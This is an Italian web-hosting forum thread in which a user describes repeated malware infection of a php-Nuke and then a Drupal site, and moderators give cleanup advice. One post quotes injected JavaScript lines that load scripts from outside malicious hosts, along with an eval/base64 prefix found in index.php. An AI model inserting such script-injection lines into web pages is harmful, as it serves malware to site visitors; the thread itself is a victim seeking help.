Visualizzazione risultati 1 fino 4 di 4

Discussione: Problema Virus e Malware

  1. #1
    Guest

    Predefinito Problema Virus e Malware

    Sul mio sito di continuo, nonostante riaplodo file non infetti, cambio pwd e controllo il sito stesso, di continuo trovo codice inserito alla prima riga del tipo eval(base64_encode(...... segue. Il sito non è navigabile e gli antivirus rilevano malware HTML:Script-inf !!!

    Le continue richieste di supporto non servono a nulla.
    Forse è un malware che attacca i siti php-nuke?
    Sul mio pc con Avanst antivirus (un buon antivurus a mio parere), non viene rilevata la presenza di malware, solo se apro il sito su altervista allora mi dà un alert!

    Come rimediare? C' è una soluzione o devo chiudere l'account e trovar un'altro hosting migliore di altervista? Oppure anche agli altri succede di essere attaccati da malwaree virus informatici?

    Grazie

  2. #2
    L'avatar di dementialsite
    dementialsite non è connesso Super Moderatore
    Data registrazione
    19-10-2004
    Residenza
    fuori Padova
    Messaggi
    5,046

    Predefinito

    Provo a darti qualche dritta per iniziare (attualmente il tuo sito non risulta navigabile, ma per un errore 500 al server, non per malware).

    A quanto dici, stai usando un CMS, la sequenza tipica delle attività da fare è questa:
    - esegui un backup di tutto il sito, database compreso
    - elimina tutti i contenuti dal tuo sito, ed installa il CMS "vergine" nella sua ultima versione
    - soltanto dopo che hai verificato che i contenuti del database non siano infetti (se così non fosse, cerca di ripurlirli... ti consiglio di fare questa procedura prima su un tuo server locale, meglio se isolato dalla rete), ripristina i contenuti del database

    Altre cose che puoi controllare: verifica se stai utilizzando qualche servizio esterno classificato come malevolo. Alcuni, insieme a possibili valide alternative, sono stati segnalati qui: http://forum.it.altervista.org/basi-...i-cattivi.html

    Ottimo il fatto che hai pensato a fare una scansione anti-virus. Anche se non ti ha trovato nulla, ti consiglio di cambiare la password del tuo account...

    Stammi bene...
    Le questioni tecniche hanno risposte migliori nel forum pubblico, non trovi?

    When you don't know your next step... improvise

    ALTERVISTA WANTS YOU!
    Vuoi diventare moderatore su AlterVista? Scopri come...

  3. #3
    Guest

    Thumbs down Attacco Malware e worm

    Ho istallato ieri un nuovo sito con l'opzione offerta di altervista istalla Drupal. Precedentemente c'era un php-Nuke ed era sempre infettto, allra ho cambiato.

    Ebbene oggi è infetto! Trovo stringhe nei file .js del tipo:

    document.write('<script src=http://coco88.hosting.paran.com/susu/8.php ><\/script>');
    document.write('<script src=http://jungmannova.cz/images/clause34.php ><\/script>');

    !!!!!!!!! oppure:

    document.write('<script src=http://spinalhealthcare.org/_private/duringsurgery2.php ><\/script>');


    e nei file index.php trovoalla prima riga eval (base64_encode(...............

    Vi sembra possibile? Come avere una soluzione oppure bisogna chiudere tutti gli account?

  4. #4
    L'avatar di Gianluca
    Gianluca non è connesso Amministratore
    Data registrazione
    15-02-2001
    Messaggi
    18,035

    Predefinito

    Vedi qui: http://forum.it.altervista.org/probl...tml#post721401

    In particolare leggi i documenti che trovi nei due link, dove ci sono indicazioni dettagliate su come avviene l'infezione
    Gianluca

Tags for this Thread

Regole di scrittura

  • Non puoi creare nuove discussioni
  • Non puoi rispondere ai messaggi
  • Non puoi inserire allegati.
  • Non puoi modificare i tuoi messaggi
  •